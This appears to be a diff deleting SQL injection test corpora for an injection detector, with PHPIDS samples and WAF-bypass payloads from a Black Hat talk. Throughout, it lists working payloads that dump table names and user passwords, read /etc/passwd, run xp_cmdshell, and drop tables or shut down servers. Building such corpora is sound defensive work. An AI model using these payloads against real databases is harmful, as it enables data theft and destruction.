if(1, sin(1), 2) union select 3
if(1 - sin(1), 2) union select 3
if((1), 1, 2) union select 3
if(-(1), 1, 2) union select 3
#
1; if exists ( /* anything */
# these aren't SQL but close enough
union (select 1)--
union all (select 1)--
union all (select distinct 1)--
union (select 1,2,3,4,5)--
union (select -1,2,3,4,5)--
union (select -(1),2,3,4,5)--
union (select -sin(1),2,3,4,5)--
1;call p(@version, @a)
1;load data infile "foo"
1;load xml infile "foo"
1;load xml local infile "foo"
1;load xml low_priority infile "foo"
1;load xml concurrent infile "foo"
1; delete from foo
1; delete low_priority from foo
1; delete quick from foo
1; delete ignore from foo
1;do (1=1)
-0b01 for update union select table_name from information_schema.tables limit 1
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
1<binary 1>2 union select table_name from information_schema.tables limit 1
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
binary (false) union select table_name from information_schema.tables limit 1
1 - binary (false) union select table_name from information_schema.tables limit 1
1 - (binary (false)) union select table_name from information_schema.tables limit 1
binary binary 1 union select table_name from information_schema.tables
binary -1 union select table_name from information_schema.tables
binary -(1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
# werid slash escaping in Older T-SQL databases
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
\1=\1AND\1=\1;
# more weird T-SQL weirdness
\%250=\-1AND\*1=\/1
# mysql
-1 procedure analyse() union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
# HT @LightOS
# issue here is how '1gfsdg..' is processed.
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(select 1 foo) union select load_file('foo');
#
# Anonymous from Research Institution of Telecom in Beijing, China
# commenting out since i have no idea how this could be a true SQL injection
#=1 union select admin,pass from admin limit 1
#=1 union select 1,2,3,4,5,6
# problems with type-casting, and nested type casting
#
# credit: Reto Ischi
#
's' || binary(1)# and n='foo"
1 - binary (1 - binary(1)) UNION SELECT 2 --
1 - binary (binary(1) -1) UNION SELECT 2 --
binary (1 - binary(1)) UNION SELECT 2 --
binary (binary(1) - 1) UNION SELECT 2 --
binary (binary(1)) UNION SELECT 2 --
#
# Padding using between operator
#
(1 between @version and "2") & 1 UNION SELECT 1
(1 between @version and @user) & 1 UNION SELECT 1
(1 between 1 and @version) & 1 UNION SELECT 1
(1 between '1' and @version) & 1 UNION SELECT 1
(1 between 1 and 2) & 1 UNION SELECT 1
(1 between '1' and '2') & 1 UNION SELECT 1
(1 between 1 and '2') & 1 UNION SELECT 1
(1 between '1' and 2) & 1 UNION SELECT 1
('1' between '1' and '2') & 1 UNION SELECT 1
(@version between '1' and '2') & 1 UNION SELECT 1
(@version between 1 and '2') & 1 UNION SELECT 1
#
# ANY and SOME subqueries
#
1 - ANY(SELECT 1,2)
ANY(SELECT 1) - 1 UNION ALL --
ANY(SELECT (1)) - 1 UNION ALL --
ANY((SELECT 1)) - 1 UNION ALL --
1 - ANY(SELECT 1) UNION ALL --
#
# embedded %A0 mysql
#
1%A0UNION%A0SELECT%A02--
1%00UNION%00SELECT%002--
#
# http://www.exploit-db.com/exploits/28854/
#
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
#
# Thanks to @rsalgado
# A degenerate MySQL ODBC case
#
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1


@ -1,132 +0,0 @@
# mysql implicit conversions tests
A' AND 'B
A 'AND' B
'AND'
' AND '
A' && 'B
A '&&' B
'&&'
' && '
A' = 'B
A '=' B
'='
' = '
A' & 'B
A '&' B
'&'
' & '
A' | 'B
A '|' B
'|'
' | '
A' ^ 'B
A '^' B
'^'
' ^ '
A' DIV 'B
A 'DIV' B
'DIV'
' DIV '
A' / 'B
A '/' B
'/'
' / '
A' <=> 'B
A '<=>' B
'<=>'
' <=> '
A' >= 'B
A '>=' B
'>='
' >= '
A' > 'B
A '>' B
'>'
' > '
A' << 'B
A '<<' B
'<<'
' << '
A' <= 'B
A '<=' B
'<='
' <= '
A' < 'B
A '<' B
'<'
' < '
A' LIKE 'B
# common false positive
#A 'LIKE' B
#'LIKE'
#' LIKE '
A' - 'B
A '-' B
'-'
' - '
A' %25 'B
A '%25' B
'%25'
' %25 '
A' MOD 'B
A 'MOD' B
'MOD'
' MOD '
A' != 'B
A '!=' B
'!='
' != '
A' <> 'B
A '<>' B
'<>'
' <> '
A' NOT LIKE 'B
A 'NOT LIKE' B
'NOT LIKE'
' NOT LIKE '
A' NOT REGEXP 'B
A 'NOT REGEXP' B
'NOT REGEXP'
' NOT REGEXP '
A' OR 'B
A 'OR' B
'OR'
' OR '
A' || 'B
A '||' B
'||'
' || '
A' %2B 'B
A '%2B' B
'%2B'
' %2B '
A' REGEXP 'B
A 'REGEXP' B
'REGEXP'
' REGEXP '
A' >> 'B
A '>>' B
'>>'
' >> '
A' RLIKE 'B
A 'RLIKE' B
'RLIKE'
' RLIKE '
A' NOT RLIKE 'B
A 'NOT RLIKE' B
'NOT RLIKE'
' NOT RLIKE '
A' SOUNDS LIKE 'B
A 'SOUNDS LIKE' B
'SOUNDS LIKE'
' SOUNDS LIKE '
A' * 'B
A '*' B
'*'
' * '
A' XOR 'B
A 'XOR' B
'XOR'
' XOR '


@ -1,275 +0,0 @@
#
# Various samples from PHPIDS
#
%22+OR+1%3D1%23
%3B+DROP+table+Users+--
admin%27--
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
10%3BDROP+members+--
SELECT+CHAR%280x66%29
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
EXEC%28%40stored_proc+%40param%29
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
1+or+name+like+%27%25%27
1+OR+%271%27%21%3D0
1+OR+ASCII%282%29+%3D+ASCII%282%29
1%27+OR+1%26%221
1%27+OR+%271%27+XOR+%270
1+OR%2B1%3D1
1+OR%2B%281%29%3D%281%29
aaa%27+or+%281%29%3D%281%29+%23%21asd
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
a%27+or+1%3D%271
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
1%27%3B+anything%3A+goto+anything+--+-a
%27+%3D%2B+%27
asd%27+%3D-+%28-%27asd%27%29+--+-a
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
aa%22+%3D%2B+-+%220++
aa%27+LIKE+0+--+-a
aa%27+LIKE+md5%281%29+or+%271
aa%27+REGEXP-+md5%281%29+or+%271
aa%27+DIV%401+%3D+0+or+%271
aa%27+XOR-+column+%21%3D+-%270
union+select+password+from+users+where+1
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
asd%22or-1%3D%22-1
asd%22or%211%3D%22%211
asd%22or%21%281%29%3D%221
asd%22or%401%3D%22%401
asd%22or-1+XOR%220
asd%22+or+ascii%281%29%3D%2249
asd%22+or+md5%281%29%5E%221
asd%22+or+table.column%5E%221
asd%22+or+%40%40version%5E%220
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
1%22OR%21%22a
1%22OR%21%220
1%22OR-%221
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
1%22OR%21%28false%29+%231+%21
1%22OR-%28true%29+%23a+%21
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
asd%27+or+md5%285%29%5E%271+
asd%27+or+column%5E%27-1+
asd%27+or+true+--+a
%5C%22asd%22+or+1%3D%221
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
aa%5C%5C%22aaa%27+or+%271
%27+or+id%3D+1+having+1+%231+%21
%27+or+id%3D+2-1+having+1+%231+%21
aa%27or+null+is+null+%23%28
aa%27or+current_user%21%3D%27+1
aa%27or+BINARY+1%3D+%271
aa%27or+LOCALTIME%21%3D%270
aa%27like-%27aa
aa%27is%5CN%7C%21%27
%27is%5CN-%21%27
asd%27%7Ccolumn%26%26%271
asd%27%7Ccolumn%21%3D%27
aa%27or+column%3Dcolumn+--+%23aa
aa%27or+column%2Acolumn%21%3D%270
aa%27or+column+like+column+--+%23a
0%27%2Acolumn+is+%5CN+-+%271
1%27%2Acolumn+is+%5CN+or+%271
1%27%2A%40a+is+%5CN+-+%27
1%27%2A%40a+is+%5CN+or+%271
1%27+-1+or%2B1%3D+%27%2B1+
1%27+-1+-+column+or+%271+
1%27+-1+or+%271
+%281%29or%281%29%3D%281%29+
fo%22o%27or%271
%27+OR+UserID+IS+NOT+2
%27+OR+UserID+IS+NOT+NULL
%27+OR+UserID+%3E+1
%27++OR+UserID+RLIKE++%27.%2B%27+
%27OR+UserID+%3C%3E+2
1%27+union+%28select+password+from+users%29+--+-a
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
aa%27%21%3D%271
aa%27%21%3D%7E%271
aa%27%3D%28%27aa%27%29%23%28
aa%27%7C%2B%271
aa%27%7C%21%27aa
aa%27%5E%21%27aa+
abc%27+%3D+%21%21%270
abc%27+%3D+%21%21%21%21%270
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
abc%27+%3D+%210+%3D+%21%21%270
abc%27+%3D+%210+%21%3D+%21%21%21%270
abc%27+%3D+%21%2B0+%21%3D+%21%270+
aa%27%3D%2B%271
%27%3Bif+1%3D1+drop+database+test--+-a
%27%3Bif+1%3D1+drop+table+users--+-a
%27%3Bif+1%3D1+shutdown--+-a
%27%3B+while+1%3D1+shutdown--+-a
%27%3B+begin+shutdown+end--+-a+
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
aa%27in+%280%29%23%28
aa%27%21%3Dascii%281%29%23%28
%27+or+SOUNDEX+%281%29+%21%3D+%270
aa%27RLIKE+BINARY+0%23%28
aa%27or+column%21%3D%271
aa%27or+column+DIV+0+%3D0+%23
aa%27or+column%2B%281%29%3D%271
aa%27or+0%21%3D%270
aa%27LIKE%270
aa%27or+id+%3D%27%5C%27
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27%21%3Dascii%281%29+or-1%3D-%271
a%27IS+NOT+NULL+or%2B1%3D%2B%271
aa%27in%28%27aa%27%29+or-1%21%3D%270
aa%27+or+column%3D%2B%211+%231
aa%27+SOUNDS+like%2B%271
aa%27+REGEXP%2B%270
aa%27+like%2B%270
-1%27%3D-%27%2B1
%27%3D%2B%27
aa%27+or+stringcolumn%3D+%2B%211+%231+
aa%27+or+anycolumn+%5E+-%271
aa%27+or+intcolumn+%26%26+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27+or+column%3D%2B%211+%231
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
aa%27%7C3%21%3D%274
aa%27%7Cascii%281%29%2B1%21%3D%271
aa%27%7CLOCALTIME%2A0%21%3D%271+
asd%27+%7C1+%21%3D+%281%29%23aa
%27+is+99999+%3D+%27
%27+is+0.00000000000+%3D+%27
1%27%2Acolumn-0-%270
1%27-%40a+or%271
a%27-%40a%3D%40a+or%271
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
a%27+or%7Ecolumn+like+%7E1%7C%271
%27%3C%7E%27
a%27-1.and+%271
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
aa%27%260%2B1%3D%27aa
aa%27+like%280%29+%2B+1--+-a+
aa%27%5E0%2B0%3D%270
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
aa%27%3C3%2B1+or%2B1%3D%2B%271
aa%27%251%2B0%3D%270
%27%2F1%2F1%3D%27
+aa%27%2F1+or+%271
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
+%27+%2F+1+%2F+1+%3D%27
+%27%2F1%3D%27
+aa%27%260%2B1+%3D+%27aa
+aa%27%26%2B1%3D%27aa
+aa%27%26%281%29%3D%27aa
+aa%27%5E0%2B0+%3D+%270
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
+aa%27%5E%2B-3+or%271
+aa%27%5E0%21%3D%271
+aa%27%5E%280%29%3D%270
+aa%27+%3C+%283%29+or+%271
+aa%27+%3C%3C3+or%271
+aa%27-%2B%211+or+%271
+aa%27-%211+like%270
+aa%27+%25+1+or+%271
+aa%27+%2F+%271%27+%3C+%273
+aa%27+%2F+%2B1+%3C+%273
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
+aa%27+-+%2B+%21+1+or+%271
+aa%27+%2F+%2B1+like+%270
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
+aa%27+%5E+%2B+-+3+or+%271
+aa%27+%5E+%2B0%21%3D%271
+aa%27+%3C+%2B3+or+%271
+aa%27+%25+%2B1+or+%271
aa%27or+column%2A0+like%270
aa%27or+column%2A0%3D%270
aa%27or+current_date%2A0
1%27%2Fcolumn+is+not+null+-+%27+
1%27%2Acolumn+is+not+%5CN+-+%27+
1%27%5Ecolumn+is+not+null+-+%27+
aa%27+is+0+or+%271
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
1%27%2A%40a+or+%271
1%27%2Anull+or+%271
1%27%2AUTC_TIME+or+%271
1%27%2Anull+is+null+-+%27
1%27%2A%40a+is+null+-+%27
1%27%2A%40%40version%2A-0%2520%3D%2520%270
1%27%2Acurrent_date+rlike%270
aa%27%2Fcurrent_date+in+%280%29+--+-a
aa%27+%2F+current_date+regexp+%270
aa%27+%2F+current_date+%21%3D+%271
1%27+or+current_date%2A-0+rlike%271
0%27+%2F+current_date+XOR+%271
%27or+not+false+%23aa
1%27+%2A+id+-+%270
1%27+%2Aid-%270
asd%27%3B+shutdown%3B+
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
# double encoded
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%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%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
## asd%27%3B+select+%5Bcolumn%5D+from+users+
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
1+order+by+ifnull%28null%2Cuserid%29+
2%27+between+1+and+3+or+0x61+like+%27a
4%27+MOD+2+like+%270
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
2%27+%2F+0x62+or+0+like+binary+%270
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
AND+ISNULL%281%2F0%29
MID%28%40%40hostname%2C+1%2C+1%29
CHARSET%28CURRENT_USER%28%29%29
DATABASE%28%29+LIKE+SCHEMA%28%29
COERCIBILITY%28USER%28%29%29
1%27+and+0x1abc+like+0x88+or+%270
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
1%27+and+0x31%3D%271+
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
# skipping
#SELECT+1%2C2%2C0xEF%60
#SELECT+1%2C2%2C3%60abc%60%60
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27


@ -1,151 +0,0 @@
#
# from
# Roberto Salgado
# SQLi Optimization and Obfuscation Techniques
# Black Hat USA 2013
#
#
# Slide 47 - Optimizing Queries MSSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
#
# Slide 48 - Optimizing Queries Oracle
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
#
# Slide 49 - Optimizing Queries PSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
#
# Slide 50 - Optimizing Queries MSSQL
#
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
#
# Slide 54 - Optimizing Queries - More Single Liners
# (
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 55
#
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 61
#
1!=0--+"!="'!='
#
# Slide 64 How to confuse an Admin
#
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! 
!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
#
# Slide 74 (MySQL Obfuscation)
#
1.UNION SELECT 2
3.2UNION SELECT 2
1e0UNION SELECT 2
SELECT\N/0.e3UNION SELECT 2
1e1AND-0.0UNION SELECT 2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts 1}UNION SELECT.`` 1.e.table_name
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS)
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name
#
# Slide 75 (MSSQL Obfuscation)
#
.1UNION SELECT 2
1.UNION SELECT.2alias
1e0UNION SELECT 2
1e1AND-1=0.0UNION SELECT 2
SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[information_schema].[tables]
#
# Slide 76 (Oracle Obfuscation)
#
1FUNION SELECT 2
1DUNION SELECT 2
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables
#
# Slide 77 (Bypassing Firewalls, General Tips)
#
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
#
# Slide 78 (Modsecurity)
#
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
#
# Slide 79 (Modsecurity)
#
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
#
# Slide 80 (Fortinet)
# (Skipped since specific to Fortinet)
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
#
# Slide 81 (GreenSQL)
#
-1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =C,1,2)
#
# Slide 83 (libinjection)
#
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
# note changed "FROM table" to "FROM table_name"
# and "column" to "column_name"
-1fUNION SELECT column_name FROM table_name
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
#
# Slide 84 (libinjection)
#
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
1 mod /*!1*/ union select table_name from information_schema.tables--
true is not unknown for update union select table_name from information_schema.tables
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
-1 union select @``"", table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
$.``.id and 0 union select table_name from information_schema.tables
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
